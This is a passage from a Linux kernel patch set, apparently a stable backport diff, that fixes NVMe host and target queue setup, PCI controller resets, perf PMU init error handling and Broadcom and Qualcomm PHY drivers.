+ 	set->timeout = NVME_IO_TIMEOUT;
+-	if (ops->map_queues)
+-		set->nr_maps = ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2;
++	set->nr_maps = nr_maps;
+ 	ret = blk_mq_alloc_tag_set(set);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 5d57a042dbcad..20b0c29a9a341 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -2903,7 +2903,7 @@ nvme_fc_create_io_queues(struct nvme_fc_ctrl *ctrl)
+ 	nvme_fc_init_io_queues(ctrl);
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_fc_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			&nvme_fc_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
+ 			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
+ 				    ctrl->lport->ops->fcprqst_priv_sz));
+ 	if (ret)
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index a29877217ee65..8a0db9e06dc65 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -743,7 +743,7 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ void nvme_remove_admin_tag_set(struct nvme_ctrl *ctrl);
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size);
++		unsigned int nr_maps, unsigned int cmd_size);
+ void nvme_remove_io_tag_set(struct nvme_ctrl *ctrl);
+ 
+ void nvme_remove_namespaces(struct nvme_ctrl *ctrl);
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index 6e079abb22ee9..a55d3e8b607d5 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -798,7 +798,9 @@ static int nvme_rdma_alloc_tag_set(struct nvme_ctrl *ctrl)
+ 			    NVME_RDMA_METADATA_SGL_SIZE;
+ 
+ 	return nvme_alloc_io_tag_set(ctrl, &to_rdma_ctrl(ctrl)->tag_set,
+-			&nvme_rdma_mq_ops, BLK_MQ_F_SHOULD_MERGE, cmd_size);
++			&nvme_rdma_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
++			cmd_size);
+ }
+ 
+ static void nvme_rdma_destroy_admin_queue(struct nvme_rdma_ctrl *ctrl)
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 9b47dcb2a7d97..83735c52d34a0 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1868,6 +1868,7 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 		ret = nvme_alloc_io_tag_set(ctrl, &to_tcp_ctrl(ctrl)->tag_set,
+ 				&nvme_tcp_mq_ops,
+ 				BLK_MQ_F_SHOULD_MERGE | BLK_MQ_F_BLOCKING,
++				ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
+ 				sizeof(struct nvme_tcp_request));
+ 		if (ret)
+ 			goto out_free_io_queues;
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index aecb5853f8da4..683b75a992b3d 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -15,6 +15,7 @@
+ 
+ #include "nvmet.h"
+ 
++struct kmem_cache *nvmet_bvec_cache;
+ struct workqueue_struct *buffered_io_wq;
+ struct workqueue_struct *zbd_wq;
+ static const struct nvmet_fabrics_ops *nvmet_transports[NVMF_TRTYPE_MAX];
+@@ -1631,26 +1632,28 @@ void nvmet_subsys_put(struct nvmet_subsys *subsys)
+ 
+ static int __init nvmet_init(void)
+ {
+-	int error;
++	int error = -ENOMEM;
+ 
+ 	nvmet_ana_group_enabled[NVMET_DEFAULT_ANA_GRPID] = 1;
+ 
++	nvmet_bvec_cache = kmem_cache_create("nvmet-bvec",
++			NVMET_MAX_MPOOL_BVEC * sizeof(struct bio_vec), 0,
++			SLAB_HWCACHE_ALIGN, NULL);
++	if (!nvmet_bvec_cache)
++		return -ENOMEM;
++
+ 	zbd_wq = alloc_workqueue("nvmet-zbd-wq", WQ_MEM_RECLAIM, 0);
+ 	if (!zbd_wq)
+-		return -ENOMEM;
++		goto out_destroy_bvec_cache;
+ 
+ 	buffered_io_wq = alloc_workqueue("nvmet-buffered-io-wq",
+ 			WQ_MEM_RECLAIM, 0);
+-	if (!buffered_io_wq) {
+-		error = -ENOMEM;
++	if (!buffered_io_wq)
+ 		goto out_free_zbd_work_queue;
+-	}
+ 
+ 	nvmet_wq = alloc_workqueue("nvmet-wq", WQ_MEM_RECLAIM, 0);
+-	if (!nvmet_wq) {
+-		error = -ENOMEM;
++	if (!nvmet_wq)
+ 		goto out_free_buffered_work_queue;
+-	}
+ 
+ 	error = nvmet_init_discovery();
+ 	if (error)
+@@ -1669,6 +1672,8 @@ out_free_buffered_work_queue:
+ 	destroy_workqueue(buffered_io_wq);
+ out_free_zbd_work_queue:
+ 	destroy_workqueue(zbd_wq);
++out_destroy_bvec_cache:
++	kmem_cache_destroy(nvmet_bvec_cache);
+ 	return error;
+ }
+ 
+@@ -1680,6 +1685,7 @@ static void __exit nvmet_exit(void)
+ 	destroy_workqueue(nvmet_wq);
+ 	destroy_workqueue(buffered_io_wq);
+ 	destroy_workqueue(zbd_wq);
++	kmem_cache_destroy(nvmet_bvec_cache);
+ 
+ 	BUILD_BUG_ON(sizeof(struct nvmf_disc_rsp_page_entry) != 1024);
+ 	BUILD_BUG_ON(sizeof(struct nvmf_disc_rsp_page_hdr) != 1024);
+diff --git a/drivers/nvme/target/io-cmd-file.c b/drivers/nvme/target/io-cmd-file.c
+index 64b47e2a46330..e55ec6fefd7f4 100644
+--- a/drivers/nvme/target/io-cmd-file.c
++++ b/drivers/nvme/target/io-cmd-file.c
+@@ -11,7 +11,6 @@
+ #include <linux/fs.h>
+ #include "nvmet.h"
+ 
+-#define NVMET_MAX_MPOOL_BVEC		16
+ #define NVMET_MIN_MPOOL_OBJ		16
+ 
+ void nvmet_file_ns_revalidate(struct nvmet_ns *ns)
+@@ -26,8 +25,6 @@ void nvmet_file_ns_disable(struct nvmet_ns *ns)
+ 			flush_workqueue(buffered_io_wq);
+ 		mempool_destroy(ns->bvec_pool);
+ 		ns->bvec_pool = NULL;
+-		kmem_cache_destroy(ns->bvec_cache);
+-		ns->bvec_cache = NULL;
+ 		fput(ns->file);
+ 		ns->file = NULL;
+ 	}
+@@ -59,16 +56,8 @@ int nvmet_file_ns_enable(struct nvmet_ns *ns)
+ 	ns->blksize_shift = min_t(u8,
+ 			file_inode(ns->file)->i_blkbits, 12);
+ 
+-	ns->bvec_cache = kmem_cache_create("nvmet-bvec",
+-			NVMET_MAX_MPOOL_BVEC * sizeof(struct bio_vec),
+-			0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!ns->bvec_cache) {
+-		ret = -ENOMEM;
+-		goto err;
+-	}
+-
+ 	ns->bvec_pool = mempool_create(NVMET_MIN_MPOOL_OBJ, mempool_alloc_slab,
+-			mempool_free_slab, ns->bvec_cache);
++			mempool_free_slab, nvmet_bvec_cache);
+ 
+ 	if (!ns->bvec_pool) {
+ 		ret = -ENOMEM;
+@@ -77,9 +66,10 @@ int nvmet_file_ns_enable(struct nvmet_ns *ns)
+ 
+ 	return ret;
+ err:
++	fput(ns->file);
++	ns->file = NULL;
+ 	ns->size = 0;
+ 	ns->blksize_shift = 0;
+-	nvmet_file_ns_disable(ns);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/nvme/target/loop.c b/drivers/nvme/target/loop.c
+index b45fe3adf015f..08c583258e90f 100644
+--- a/drivers/nvme/target/loop.c
++++ b/drivers/nvme/target/loop.c
+@@ -494,7 +494,7 @@ static int nvme_loop_create_io_queues(struct nvme_loop_ctrl *ctrl)
+ 		return ret;
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_loop_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			&nvme_loop_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
+ 			sizeof(struct nvme_loop_iod) +
+ 			NVME_INLINE_SG_CNT * sizeof(struct scatterlist));
+ 	if (ret)
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index dfe3894205aa7..bda1c1f71f394 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -77,7 +77,6 @@ struct nvmet_ns {
+ 
+ 	struct completion	disable_done;
+ 	mempool_t		*bvec_pool;
+-	struct kmem_cache	*bvec_cache;
+ 
+ 	int			use_p2pmem;
+ 	struct pci_dev		*p2p_dev;
+@@ -393,6 +392,8 @@ struct nvmet_req {
+ 	u64			error_slba;
+ };
+ 
++#define NVMET_MAX_MPOOL_BVEC		16
++extern struct kmem_cache *nvmet_bvec_cache;
+ extern struct workqueue_struct *buffered_io_wq;
+ extern struct workqueue_struct *zbd_wq;
+ extern struct workqueue_struct *nvmet_wq;
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index bd8ff4df723da..ed4e6c144a681 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -545,7 +545,7 @@ static int find_dup_cset_node_entry(struct overlay_changeset *ovcs,
+ 
+ 		fn_1 = kasprintf(GFP_KERNEL, "%pOF", ce_1->np);
+ 		fn_2 = kasprintf(GFP_KERNEL, "%pOF", ce_2->np);
+-		node_path_match = !strcmp(fn_1, fn_2);
++		node_path_match = !fn_1 || !fn_2 || !strcmp(fn_1, fn_2);
+ 		kfree(fn_1);
+ 		kfree(fn_2);
+ 		if (node_path_match) {
+@@ -580,7 +580,7 @@ static int find_dup_cset_prop(struct overlay_changeset *ovcs,
+ 
+ 		fn_1 = kasprintf(GFP_KERNEL, "%pOF", ce_1->np);
+ 		fn_2 = kasprintf(GFP_KERNEL, "%pOF", ce_2->np);
+-		node_path_match = !strcmp(fn_1, fn_2);
++		node_path_match = !fn_1 || !fn_2 || !strcmp(fn_1, fn_2);
+ 		kfree(fn_1);
+ 		kfree(fn_2);
+ 		if (node_path_match &&
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 2616585ca5f8a..1dde5c579edc8 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -952,12 +952,6 @@ static int imx6_pcie_host_init(struct dw_pcie_rp *pp)
+ 		}
+ 	}
+ 
+-	ret = imx6_pcie_deassert_core_reset(imx6_pcie);
+-	if (ret < 0) {
+-		dev_err(dev, "pcie deassert core reset failed: %d\n", ret);
+-		goto err_phy_off;
+-	}
+-
+ 	if (imx6_pcie->phy) {
+ 		ret = phy_power_on(imx6_pcie->phy);
+ 		if (ret) {
+@@ -965,6 +959,13 @@ static int imx6_pcie_host_init(struct dw_pcie_rp *pp)
+ 			goto err_phy_off;
+ 		}
+ 	}
++
++	ret = imx6_pcie_deassert_core_reset(imx6_pcie);
++	if (ret < 0) {
++		dev_err(dev, "pcie deassert core reset failed: %d\n", ret);
++		goto err_phy_off;
++	}
++
+ 	imx6_setup_phy_mpll(imx6_pcie);
+ 
+ 	return 0;
+diff --git a/drivers/pci/controller/dwc/pcie-designware.c b/drivers/pci/controller/dwc/pcie-designware.c
+index c6725c519a479..9e4d96e5a3f5a 100644
+--- a/drivers/pci/controller/dwc/pcie-designware.c
++++ b/drivers/pci/controller/dwc/pcie-designware.c
+@@ -641,7 +641,7 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 	if (pci->n_fts[1]) {
+ 		val = dw_pcie_readl_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL);
+ 		val &= ~PORT_LOGIC_N_FTS_MASK;
+-		val |= pci->n_fts[pci->link_gen - 1];
++		val |= pci->n_fts[1];
+ 		dw_pcie_writel_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL, val);
+ 	}
+ 
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index e06e9f4fc50f7..769eedeb8802a 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -719,6 +719,7 @@ static int vmd_enable_domain(struct vmd_dev *vmd, unsigned long features)
+ 	resource_size_t offset[2] = {0};
+ 	resource_size_t membar2_offset = 0x2000;
+ 	struct pci_bus *child;
++	struct pci_dev *dev;
+ 	int ret;
+ 
+ 	/*
+@@ -859,8 +860,25 @@ static int vmd_enable_domain(struct vmd_dev *vmd, unsigned long features)
+ 
+ 	pci_scan_child_bus(vmd->bus);
+ 	vmd_domain_reset(vmd);
+-	list_for_each_entry(child, &vmd->bus->children, node)
+-		pci_reset_bus(child->self);
++
++	/* When Intel VMD is enabled, the OS does not discover the Root Ports
++	 * owned by Intel VMD within the MMCFG space. pci_reset_bus() applies
++	 * a reset to the parent of the PCI device supplied as argument. This
++	 * is why we pass a child device, so the reset can be triggered at
++	 * the Intel bridge level and propagated to all the children in the
++	 * hierarchy.
++	 */
++	list_for_each_entry(child, &vmd->bus->children, node) {
++		if (!list_empty(&child->devices)) {
++			dev = list_first_entry(&child->devices,
++					       struct pci_dev, bus_list);
++			if (pci_reset_bus(dev))
++				pci_warn(dev, "can't reset device: %d\n", ret);
++
++			break;
++		}
++	}
++
+ 	pci_assign_unassigned_bus_resources(vmd->bus);
+ 
+ 	/*
+@@ -980,6 +998,11 @@ static int vmd_resume(struct device *dev)
+ 	struct vmd_dev *vmd = pci_get_drvdata(pdev);
+ 	int err, i;
+ 
++       if (vmd->irq_domain)
++               vmd_set_msi_remapping(vmd, true);
++       else
++               vmd_set_msi_remapping(vmd, false);
++
+ 	for (i = 0; i < vmd->msix_count; i++) {
+ 		err = devm_request_irq(dev, vmd->irqs[i].virq,
+ 				       vmd_irq, IRQF_NO_THREAD,
+diff --git a/drivers/pci/endpoint/functions/pci-epf-test.c b/drivers/pci/endpoint/functions/pci-epf-test.c
+index 36b1801a061b7..55283d2379a6a 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-test.c
++++ b/drivers/pci/endpoint/functions/pci-epf-test.c
+@@ -979,7 +979,7 @@ static int pci_epf_test_bind(struct pci_epf *epf)
+ 	if (ret)
+ 		epf_test->dma_supported = false;
+ 
+-	if (linkup_notifier) {
++	if (linkup_notifier || core_init_notifier) {
+ 		epf->nb.notifier_call = pci_epf_test_notifier;
+ 		pci_epc_register_notifier(epc, &epf->nb);
+ 	} else {
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index 0ea85e1d292ec..fba0179939b8f 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -557,7 +557,7 @@ static int epf_ntb_db_bar_init(struct epf_ntb *ntb)
+ 	return ret;
+ 
+ err_alloc_peer_mem:
+-	pci_epc_mem_free_addr(ntb->epf->epc, epf_bar->phys_addr, mw_addr, epf_bar->size);
++	pci_epf_free_space(ntb->epf, mw_addr, barno, 0);
+ 	return -1;
+ }
+ 
+diff --git a/drivers/pci/irq.c b/drivers/pci/irq.c
+index 12ecd0aaa28d6..0050e8f6814ed 100644
+--- a/drivers/pci/irq.c
++++ b/drivers/pci/irq.c
+@@ -44,6 +44,8 @@ int pci_request_irq(struct pci_dev *dev, unsigned int nr, irq_handler_t handler,
+ 	va_start(ap, fmt);
+ 	devname = kvasprintf(GFP_KERNEL, fmt, ap);
+ 	va_end(ap);
++	if (!devname)
++		return -ENOMEM;
+ 
+ 	ret = request_threaded_irq(pci_irq_vector(dev, nr), handler, thread_fn,
+ 				   irqflags, devname, dev_id);
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index b66fa42c4b1fa..1d6f7b502020d 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -1891,9 +1891,6 @@ int pci_setup_device(struct pci_dev *dev)
+ 
+ 	dev->broken_intx_masking = pci_intx_mask_broken(dev);
+ 
+-	/* Clear errors left from system firmware */
+-	pci_write_config_word(dev, PCI_STATUS, 0xffff);
+-
+ 	switch (dev->hdr_type) {		    /* header type */
+ 	case PCI_HEADER_TYPE_NORMAL:		    /* standard header */
+ 		if (class == PCI_CLASS_BRIDGE_PCI)
+diff --git a/drivers/perf/arm_dmc620_pmu.c b/drivers/perf/arm_dmc620_pmu.c
+index 280a6ae3e27cf..54aa4658fb36e 100644
+--- a/drivers/perf/arm_dmc620_pmu.c
++++ b/drivers/perf/arm_dmc620_pmu.c
+@@ -725,6 +725,8 @@ static struct platform_driver dmc620_pmu_driver = {
+ 
+ static int __init dmc620_pmu_init(void)
+ {
++	int ret;
++
+ 	cpuhp_state_num = cpuhp_setup_state_multi(CPUHP_AP_ONLINE_DYN,
+ 				      DMC620_DRVNAME,
+ 				      NULL,
+@@ -732,7 +734,11 @@ static int __init dmc620_pmu_init(void)
+ 	if (cpuhp_state_num < 0)
+ 		return cpuhp_state_num;
+ 
+-	return platform_driver_register(&dmc620_pmu_driver);
++	ret = platform_driver_register(&dmc620_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(cpuhp_state_num);
++
++	return ret;
+ }
+ 
+ static void __exit dmc620_pmu_exit(void)
+diff --git a/drivers/perf/arm_dsu_pmu.c b/drivers/perf/arm_dsu_pmu.c
+index 4a15c86f45efb..fe2abb412c004 100644
+--- a/drivers/perf/arm_dsu_pmu.c
++++ b/drivers/perf/arm_dsu_pmu.c
+@@ -858,7 +858,11 @@ static int __init dsu_pmu_init(void)
+ 	if (ret < 0)
+ 		return ret;
+ 	dsu_pmu_cpuhp_state = ret;
+-	return platform_driver_register(&dsu_pmu_driver);
++	ret = platform_driver_register(&dsu_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(dsu_pmu_cpuhp_state);
++
++	return ret;
+ }
+ 
+ static void __exit dsu_pmu_exit(void)
+diff --git a/drivers/perf/arm_smmuv3_pmu.c b/drivers/perf/arm_smmuv3_pmu.c
+index 00d4c45a8017d..25a269d431e45 100644
+--- a/drivers/perf/arm_smmuv3_pmu.c
++++ b/drivers/perf/arm_smmuv3_pmu.c
+@@ -959,6 +959,8 @@ static struct platform_driver smmu_pmu_driver = {
+ 
+ static int __init arm_smmu_pmu_init(void)
+ {
++	int ret;
++
+ 	cpuhp_state_num = cpuhp_setup_state_multi(CPUHP_AP_ONLINE_DYN,
+ 						  "perf/arm/pmcg:online",
+ 						  NULL,
+@@ -966,7 +968,11 @@ static int __init arm_smmu_pmu_init(void)
+ 	if (cpuhp_state_num < 0)
+ 		return cpuhp_state_num;
+ 
+-	return platform_driver_register(&smmu_pmu_driver);
++	ret = platform_driver_register(&smmu_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(cpuhp_state_num);
++
++	return ret;
+ }
+ module_init(arm_smmu_pmu_init);
+ 
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index 21771708597db..071e63d9a9ac6 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -693,10 +693,10 @@ static struct attribute *hisi_pcie_pmu_events_attr[] = {
+ 	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_cnt, 0x10210),
+ 	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_latency, 0x0011),
+ 	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_cnt, 0x10011),
+-	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_flux, 0x1005),
+-	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_time, 0x11005),
+-	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_flux, 0x2004),
+-	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_time, 0x12004),
++	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_flux, 0x0804),
++	HISI_PCIE_PMU_EVENT_ATTR(rx_mrd_time, 0x10804),
++	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_flux, 0x0405),
++	HISI_PCIE_PMU_EVENT_ATTR(tx_mrd_time, 0x10405),
+ 	NULL
+ };
+ 
+diff --git a/drivers/perf/marvell_cn10k_tad_pmu.c b/drivers/perf/marvell_cn10k_tad_pmu.c
+index 69c3050a4348b..a1166afb37024 100644
+--- a/drivers/perf/marvell_cn10k_tad_pmu.c
++++ b/drivers/perf/marvell_cn10k_tad_pmu.c
+@@ -408,7 +408,11 @@ static int __init tad_pmu_init(void)
+ 	if (ret < 0)
+ 		return ret;
+ 	tad_pmu_cpuhp_state = ret;
+-	return platform_driver_register(&tad_pmu_driver);
++	ret = platform_driver_register(&tad_pmu_driver);
++	if (ret)
++		cpuhp_remove_multi_state(tad_pmu_cpuhp_state);
++
++	return ret;
+ }
+ 
+ static void __exit tad_pmu_exit(void)
+diff --git a/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c b/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c
+index d2524b70ea161..3b374b37b965b 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c
++++ b/drivers/phy/broadcom/phy-brcm-usb-init-synopsys.c
+@@ -331,13 +331,12 @@ static void usb_uninit_common_7216(struct brcm_usb_init_params *params)
+ 
+ 	pr_debug("%s\n", __func__);
+ 
+-	if (!params->wake_enabled) {
+-		USB_CTRL_SET(ctrl, USB_PM, USB_PWRDN);
+-
++	if (params->wake_enabled) {
+ 		/* Switch to using slower clock during suspend to save power */
+ 		USB_CTRL_SET(ctrl, USB_PM, XHC_S2_CLK_SWITCH_EN);
+-	} else {
+ 		usb_wake_enable_7216(params, true);
++	} else {
++		USB_CTRL_SET(ctrl, USB_PM, USB_PWRDN);
+ 	}
+ }
+ 
+@@ -425,7 +424,6 @@ void brcm_usb_dvr_init_7216(struct brcm_usb_init_params *params)
+ 
+ 	params->family_name = "7216";
+ 	params->ops = &bcm7216_ops;
+-	params->suspend_with_clocks = true;
+ }
+ 
+ void brcm_usb_dvr_init_7211b0(struct brcm_usb_init_params *params)
+@@ -435,5 +433,4 @@ void brcm_usb_dvr_init_7211b0(struct brcm_usb_init_params *params)
+ 
+ 	params->family_name = "7211";
+ 	params->ops = &bcm7211b0_ops;
+-	params->suspend_with_clocks = true;
+ }
+diff --git a/drivers/phy/broadcom/phy-brcm-usb-init.h b/drivers/phy/broadcom/phy-brcm-usb-init.h
+index 1ccb5ddab865c..3236e94988428 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb-init.h
++++ b/drivers/phy/broadcom/phy-brcm-usb-init.h
+@@ -61,7 +61,6 @@ struct  brcm_usb_init_params {
+ 	const struct brcm_usb_init_ops *ops;
+ 	struct regmap *syscon_piarbctl;
+ 	bool wake_enabled;
+-	bool suspend_with_clocks;
+ };
+ 
+ void brcm_usb_dvr_init_4908(struct brcm_usb_init_params *params);
+diff --git a/drivers/phy/broadcom/phy-brcm-usb.c b/drivers/phy/broadcom/phy-brcm-usb.c
+index 2cb3779fcdf82..2bfd78e2d8fd6 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb.c
++++ b/drivers/phy/broadcom/phy-brcm-usb.c
+@@ -102,9 +102,9 @@ static int brcm_pm_notifier(struct notifier_block *notifier,
+ 
+ static irqreturn_t brcm_usb_phy_wake_isr(int irq, void *dev_id)
+ {
+-	struct phy *gphy = dev_id;
++	struct device *dev = dev_id;
+ 
+-	pm_wakeup_event(&gphy->dev, 0);
++	pm_wakeup_event(dev, 0);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -451,7 +451,7 @@ static int brcm_usb_phy_dvr_init(struct platform_device *pdev,
+ 	if (priv->wake_irq >= 0) {
+ 		err = devm_request_irq(dev, priv->wake_irq,
+ 				       brcm_usb_phy_wake_isr, 0,
+-				       dev_name(dev), gphy);
++				       dev_name(dev), dev);
+ 		if (err < 0)
+ 			return err;
+ 		device_set_wakeup_capable(dev, 1);
+@@ -598,7 +598,7 @@ static int brcm_usb_phy_suspend(struct device *dev)
+ 		 * and newer XHCI->2.0-clks/3.0-clks.
+ 		 */
+ 
+-		if (!priv->ini.suspend_with_clocks) {
++		if (!priv->ini.wake_enabled) {
+ 			if (priv->phys[BRCM_USB_PHY_3_0].inited)
+ 				clk_disable_unprepare(priv->usb_30_clk);
+ 			if (priv->phys[BRCM_USB_PHY_2_0].inited ||
+@@ -615,8 +615,10 @@ static int brcm_usb_phy_resume(struct device *dev)
+ {
+ 	struct brcm_usb_phy_data *priv = dev_get_drvdata(dev);
+ 
+-	clk_prepare_enable(priv->usb_20_clk);
+-	clk_prepare_enable(priv->usb_30_clk);
++	if (!priv->ini.wake_enabled) {
++		clk_prepare_enable(priv->usb_20_clk);
++		clk_prepare_enable(priv->usb_30_clk);
++	}
+ 	brcm_usb_init_ipp(&priv->ini);
+ 
+ 	/*
+diff --git a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+index 67712c77d806f..d641b345afa35 100644
+--- a/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
++++ b/drivers/phy/marvell/phy-mvebu-a3700-comphy.c
+@@ -826,6 +826,9 @@ mvebu_a3700_comphy_usb3_power_on(struct mvebu_a3700_comphy_lane *lane)
+ 	if (ret)
+ 		return ret;
+ 
++	/* COMPHY register reset (cleared automatically) */
++	comphy_lane_reg_set(lane, COMPHY_SFT_RESET, SFT_RST, SFT_RST);
++
+ 	/*
+ 	 * 0. Set PHY OTG Control(0x5d034), bit 4, Power up OTG module The
+ 	 * register belong to UTMI module, so it is set in UTMI phy driver.
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+index 5be5348fbb26b..bb40172e23d49 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+@@ -14,6 +14,7 @@
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/of_address.h>
++#include <linux/phy/pcie.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
+ #include <linux/regulator/consumer.h>
+@@ -505,6 +506,13 @@ static const struct qmp_phy_init_tbl ipq8074_pcie_gen3_pcs_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_FLL_CNTRL1, 0x01),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_P2U3_WAKEUP_DLY_TIME_AUXCLK_H, 0x0),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_P2U3_WAKEUP_DLY_TIME_AUXCLK_L, 0x1),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_G12S1_TXDEEMPH_M3P5DB, 0x10),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_DCC_CAL_CONFIG, 0x01),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_SIGDET_LVL, 0xaa),
++	QMP_PHY_INIT_CFG(QPHY_V4_PCS_REFGEN_REQ_CONFIG1, 0x0d),
++};
++
++static const struct qmp_phy_init_tbl ipq8074_pcie_gen3_pcs_misc_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_ACTIONS, 0x0),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_L1P1_WAKEUP_DLY_TIME_AUXCLK_H, 0x00),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_L1P1_WAKEUP_DLY_TIME_AUXCLK_L, 0x01),
+@@ -517,11 +525,7 @@ static const struct qmp_phy_init_tbl ipq8074_pcie_gen3_pcs_tbl[] = {
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_MODE2_CONFIG2, 0x50),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_MODE2_CONFIG4, 0x1a),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_OSC_DTCT_MODE2_CONFIG5, 0x6),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_G12S1_TXDEEMPH_M3P5DB, 0x10),
+ 	QMP_PHY_INIT_CFG(QPHY_V4_PCS_PCIE_ENDPOINT_REFCLK_DRIVE, 0xc1),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_DCC_CAL_CONFIG, 0x01),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_RX_SIGDET_LVL, 0xaa),
+-	QMP_PHY_INIT_CFG(QPHY_V4_PCS_REFGEN_REQ_CONFIG1, 0x0d),
+ };
+ 
+ static const struct qmp_phy_init_tbl sdm845_qmp_pcie_serdes_tbl[] = {
+@@ -1184,15 +1188,29 @@ static const struct qmp_phy_init_tbl sm8450_qmp_gen3x1_pcie_pcs_misc_tbl[] = {
+ };
+ 
+ static const struct qmp_phy_init_tbl sm8450_qmp_gen4x2_pcie_serdes_tbl[] = {
++	QMP_PHY_INIT_CFG(QSERDES_V5_COM_BIAS_EN_CLKBUFLR_EN, 0x14),
